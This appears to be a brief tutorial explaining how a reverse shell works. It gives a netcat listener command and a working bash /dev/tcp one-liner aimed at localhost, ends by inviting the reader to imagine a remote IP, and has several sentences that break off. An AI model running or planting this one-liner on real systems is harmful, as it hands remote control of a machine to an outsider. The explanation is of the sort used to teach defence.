It’s a(n insecure) remote shell introduced by the target. That’s the opposite of a “normal” remote shell, that is introduced by the source.
Let’s try it with
localhost instead of
- Open two tabs in your terminal.
- open TCP port 8080 and wait for a connection:nc localhost -lp 8080
- Open an interactive shell, and redirect the IO streams to a TCP socket:bash -i >& /dev/tcp/localhost/8080 0>&1 where
bash -i“If the -i option is present, the shell is interactive.”
>&“This special syntax redirects both, stdout and stderr to the specified target.”
- (argument for
/dev/tcp/localhost/8080is a TCP client connection to
0>&1redirect file descriptor 0 (stdin) to fd 1 (stdout), hence the opened TCP socket is used to read input.
- Rejoice as you have a prompt in tab 1.
- Now imagine not using
localhost, but some remote IP.